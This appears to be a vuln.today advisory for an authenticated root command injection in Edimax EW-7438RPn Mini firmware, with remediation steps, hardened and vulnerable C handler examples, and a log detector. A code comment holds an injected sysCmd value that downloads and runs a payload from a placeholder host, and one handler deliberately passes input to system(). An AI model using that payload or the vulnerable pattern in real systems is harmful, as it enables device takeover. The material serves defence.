CVE-2025-34029

EUVD-2025-18775 | Severity: HIGH | Published: 2025-06-20 | CNA contact: [email protected]
CVSS 3.1 base score: 8.8

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline (4 events, newest first)

Analysis Generated: Mar 15, 2026 00:19 (vuln.today)
EUVD ID Assigned: Mar 15, 2026 00:19 (euvd), EUVD-2025-18775
PoC Detected: Nov 20, 2025 22:15 (vuln.today), public exploit code
CVE Published: Jun 20, 2025 19:15 (nvd), HIGH 8.8

Description

An OS command injection vulnerability exists in the Edimax EW-7438RPn Mini firmware version 1.13 and prior via the syscmd.asp form handler. The /goform/formSysCmd endpoint exposes a system command interface through the sysCmd parameter. A remote authenticated attacker can submit arbitrary shell commands directly, resulting in command execution as the root user. Exploitation evidence was observed by the Shadowserver Foundation on 2024-09-14 UTC.

Analysis

CVE-2025-34029 is an OS command injection vulnerability in Edimax EW-7438RPn Mini wireless range extender firmware version 1.13 and prior that allows authenticated remote attackers to execute arbitrary shell commands as root through the /goform/formSysCmd endpoint. The vulnerability has a CVSS score of 8.8 (High). The Shadowserver Foundation observed exploitation in the wild on 2024-09-14 UTC, roughly nine months before the CVE was published on 2025-06-20, and public exploit code was detected on 2025-11-20. Devices whose management interface was reachable by untrusted networks during that window should be treated as potentially compromised rather than merely unpatched.

Technical Context

The vulnerability resides in the syscmd.asp form handler, which exposes a system command interface through the 'sysCmd' parameter with no input validation or sanitization. This is a classic OS command injection (CWE-78): user-supplied input from the sysCmd parameter is passed directly to a shell execution function, most likely system() or a similar UNIX command execution API common in embedded web-based device management interfaces. Because the device's web server runs as root, no further privilege escalation is needed once a command executes. The only barrier is authentication (PR:L), so weak or default administrator credentials turn this into an effectively unauthenticated compromise. The affected device is the Edimax EW-7438RPn Mini, a compact wireless range extender/access point typically found in home and small-office networks, and the vulnerability exists in firmware version 1.13 and all prior releases. The /goform/ prefix is the form-handler convention of the GoAhead embedded web server, which is typical of embedded Linux devices built on common vendor SDKs; the correct fix for a handler of this kind is not to filter shell metacharacters but to stop passing client-supplied strings to a shell at all.
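The pattern described above, as an added example that is not Edimax's firmware or code from vuln.today: a GoAhead-style form handler in which the sysCmd field goes straight to system(), beside a hardened handler that maps an action name onto a fixed argv table and never invokes a shell. Only the endpoint and parameter names come from the advisory; the function names, the allowlist entries and the log path are assumptions made for the example.

```c
/* Added example, not Edimax's firmware: the CWE-78 pattern the analysis describes,
 * written as a GoAhead-style form handler. The vulnerable handler hands the
 * sysCmd field straight to the shell; the hardened one maps an action name onto a
 * fixed argv table and never invokes a shell. Everything except the endpoint and
 * parameter names is an assumption made for the example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* --- Vulnerable pattern ------------------------------------------------ */

/* Build the command line exactly as a naive handler would: the raw field plus a
 * redirect so the output can be shown on syscmd.asp. No validation anywhere. */
size_t vuln_build_cmdline(const char *sysCmd, char *out, size_t outlen)
{
    return (size_t)snprintf(out, outlen, "%s > /tmp/syscmd.log 2>&1", sysCmd);
}

/* Because system() runs "/bin/sh -c <string>", a field such as
 * "ls; wget http://192.0.2.1/x -O /tmp/x; sh /tmp/x" executes all three clauses,
 * as whatever user the web server runs as (root on the affected device). */
void vuln_form_sys_cmd(const char *sysCmd)
{
    char cmd[512];
    vuln_build_cmdline(sysCmd, cmd, sizeof cmd);
#ifdef ACTUALLY_EXECUTE
    system(cmd);
#else
    printf("vulnerable handler would run: /bin/sh -c '%s'\n", cmd);
#endif
}

/* Helper for inspecting the vulnerable path without executing anything. */
int vuln_cmdline_contains(const char *sysCmd, const char *needle)
{
    char cmd[512];
    vuln_build_cmdline(sysCmd, cmd, sizeof cmd);
    return strstr(cmd, needle) != NULL;
}

/* --- Hardened pattern --------------------------------------------------- */

/* The browser never sends a command string. It sends an action name that is
 * looked up here; each entry is a complete argv vector (assumed entries). */
struct action { const char *name; const char *const argv[4]; };

static const struct action ALLOWED[] = {
    { "reboot",     { "/sbin/reboot", NULL } },
    { "show_if",    { "/sbin/ifconfig", NULL } },
    { "show_route", { "/sbin/route", "-n", NULL } },
};
#define N_ALLOWED (sizeof ALLOWED / sizeof ALLOWED[0])

/* Exact-match lookup. "reboot; id", "reboot\n", "$(id)" and "" all return -1;
 * there is no blocklist of metacharacters to get wrong. */
int hardened_resolve(const char *action)
{
    for (size_t i = 0; i < N_ALLOWED; i++)
        if (strcmp(action, ALLOWED[i].name) == 0)
            return (int)i;
    return -1;
}

/* Run the resolved action with fork()+execv(): no shell is involved, so the
 * arguments are never re-parsed. Returns the child's exit status, or -1 if the
 * action was rejected. Still authenticate the caller first: PR:L on this CVE
 * means the bug is reachable by any logged-in user, and a hardened handler does
 * nothing about weak or default credentials. */
int hardened_form_sys_cmd(const char *action)
{
    int idx = hardened_resolve(action);
    if (idx < 0) return -1;
#ifdef ACTUALLY_EXECUTE
    pid_t pid = fork();
    if (pid == 0) {
        execv(ALLOWED[idx].argv[0], (char *const *)ALLOWED[idx].argv);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
#else
    printf("hardened handler would execv: %s\n", ALLOWED[idx].argv[0]);
    return 0;
#endif
}

int main(void)
{
    vuln_form_sys_cmd("ls; id");                 /* both clauses reach the shell */
    hardened_form_sys_cmd("show_route");         /* allowed action */
    printf("rejected: %d\n", hardened_resolve("show_route; id"));
    return 0;
}
```

Build with `-DACTUALLY_EXECUTE` only on a throwaway host if you want the two handlers to really execute; without it the program prints what each handler would run. The design point is that the hardened handler has no string that ever reaches a shell, so escaping rules, newline tricks and `$(...)` substitution simply do not apply.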

Affected Products

Edimax EW-7438RPn Mini wireless range extender/access point, firmware version 1.13 and all prior versions. CPE specification: cpe:2.3:o:edimax:ew-7438rpn_mini_firmware:*:*:*:*:*:*:*:* (versions up to and including 1.13). Only the EW-7438RPn Mini is named; other Edimax models built on the same firmware base may share the syscmd.asp handler, but the advisory does not list them. No vendor advisory URL is provided in the description; organizations should contact Edimax directly or monitor their support portal for firmware updates beyond version 1.13.

Remediation

Immediate remediation steps:

1. Upgrade Edimax EW-7438RPn Mini firmware to a version newer than 1.13. The description names no patched version; check http://www.edimax.com or contact Edimax support for firmware downloads, and confirm whether the model is still supported, since an end-of-life device will not receive a fix and should be replaced.
2. If patched firmware is unavailable, apply network-level mitigations: restrict access to the device management interface (ports 80/443) with firewall rules, disable remote (WAN-side) management if enabled, and ensure the device is reachable only from trusted administrative networks.
3. Change default credentials. Exploitation requires a valid login (PR:L), so strong, unique administrator credentials are the one control that directly raises the cost of attack on an unpatched device.
4. Monitor traffic to the device for requests to /goform/formSysCmd, in particular any from hosts that are not known administrative workstations.
5. Because exploitation was observed on 2024-09-14, well before the CVE was published, and public exploit code now exists, treat any device that was exposed as potentially compromised: review its configuration for unexpected changes (admin accounts, DNS or remote-management settings), and factory-reset before redeploying it.
6. Consider isolating or decommissioning affected devices in high-security environments until patching is confirmed.

Check Edimax security advisories at their support site for official patches and timelines.
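One way to implement the monitoring step, as an added example that is not part of the vuln.today page: a small C program that parses combined-format web server or proxy log lines, flags requests that name the /goform/formSysCmd endpoint or carry a sysCmd= query parameter, and separates hits from known administrative hosts (which may be legitimate use of the page) from hits from anywhere else. The log lines, the admin-host list and all function names are constructed for the example.

```c
/* Added example, not from vuln.today or Edimax: flag requests to the
 * /goform/formSysCmd endpoint in combined-format access or proxy logs.
 * The log lines and the admin-host list are constructed for the example. */
#include <stdio.h>
#include <string.h>

struct req {
    char client[64];
    char method[8];
    char path[256];
    int  status;
};

/* Parse one combined-log-format line into its request fields.
 * Returns 1 on success, 0 if the line does not have the expected shape. */
int parse_request(const char *line, struct req *r)
{
    int n = sscanf(line, "%63s %*s %*s [%*[^]]] \"%7s %255s %*[^\"]\" %d",
                   r->client, r->method, r->path, &r->status);
    return n == 4;
}

/* The endpoint named in the advisory, and the parameter the command arrives in. */
static const char ENDPOINT[] = "/goform/formSysCmd";
static const char PARAM[]    = "sysCmd=";

/* A request is of interest if its path names the endpoint (with any query
 * string) or carries the sysCmd parameter in its query. Percent-encoded
 * variants (e.g. %2Fgoform) are not decoded here; normalise before matching
 * in production. */
int is_syscmd_request(const struct req *r)
{
    if (strncmp(r->path, ENDPOINT, sizeof ENDPOINT - 1) == 0)
        return 1;
    const char *q = strchr(r->path, '?');
    return q != NULL && strstr(q, PARAM) != NULL;
}

/* Hosts allowed to reach the management interface (assumed for the example).
 * PR:L means a hit from one of these may be legitimate administration; a hit
 * from anywhere else indicates exposure or stolen credentials. */
static const char *const ADMIN_HOSTS[] = { "192.168.2.10" };

int from_admin_host(const char *client)
{
    for (size_t i = 0; i < sizeof ADMIN_HOSTS / sizeof ADMIN_HOSTS[0]; i++)
        if (strcmp(client, ADMIN_HOSTS[i]) == 0) return 1;
    return 0;
}

/* Classify one line: -1 unparseable, 0 benign,
 * 1 formSysCmd request from an admin host, 2 formSysCmd request from elsewhere. */
int classify_line(const char *line)
{
    struct req r;
    if (!parse_request(line, &r)) return -1;
    if (!is_syscmd_request(&r)) return 0;
    return from_admin_host(r.client) ? 1 : 2;
}

/* Count the lines of a given class. */
size_t count_class(const char *const *lines, size_t nlines, int cls)
{
    size_t n = 0;
    for (size_t i = 0; i < nlines; i++)
        if (classify_line(lines[i]) == cls) n++;
    return n;
}

/* Constructed sample: one hit from an unknown host, one from the admin host,
 * two benign requests. */
static const char *const SAMPLE_LOG[] = {
    "192.168.2.50 - - [20/Nov/2025:22:15:03 +0000] \"POST /goform/formSysCmd HTTP/1.1\" 200 512 \"-\" \"curl/8.4.0\"",
    "192.168.2.10 - - [20/Nov/2025:22:16:10 +0000] \"GET /index.asp HTTP/1.1\" 200 4096 \"-\" \"Mozilla/5.0\"",
    "192.168.2.10 - - [20/Nov/2025:22:16:42 +0000] \"GET /goform/formSysCmd?sysCmd=ifconfig HTTP/1.1\" 200 300 \"-\" \"Mozilla/5.0\"",
    "192.168.2.77 - - [20/Nov/2025:22:17:00 +0000] \"POST /goform/formLogin HTTP/1.1\" 302 0 \"-\" \"Mozilla/5.0\"",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

size_t sample_count(int cls) { return count_class(SAMPLE_LOG, SAMPLE_LOG_LEN, cls); }

int main(void)
{
    static const char *const label[] = { "benign", "NOTE  admin-host formSysCmd", "ALERT formSysCmd" };
    for (size_t i = 0; i < SAMPLE_LOG_LEN; i++) {
        int c = classify_line(SAMPLE_LOG[i]);
        if (c > 0) printf("%s: %s\n", label[c], SAMPLE_LOG[i]);
    }
    printf("%zu alerts, %zu admin-host hits\n", sample_count(2), sample_count(1));
    return 0;
}
```

Any hit from a non-admin host is worth an immediate look at the device itself, since a 200 response on this endpoint means the command already ran as root. The admin-host exception is deliberately narrow: if nobody on the team uses syscmd.asp, drop the allowlist and alert on every hit.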

Priority Score

66 (scale: Low / Medium / High / Critical)
Components: KEV 0 (no KEV contribution), EPSS +2.1, CVSS +44, PoC +20


CVE-2025-34029 vulnerability details – vuln.today
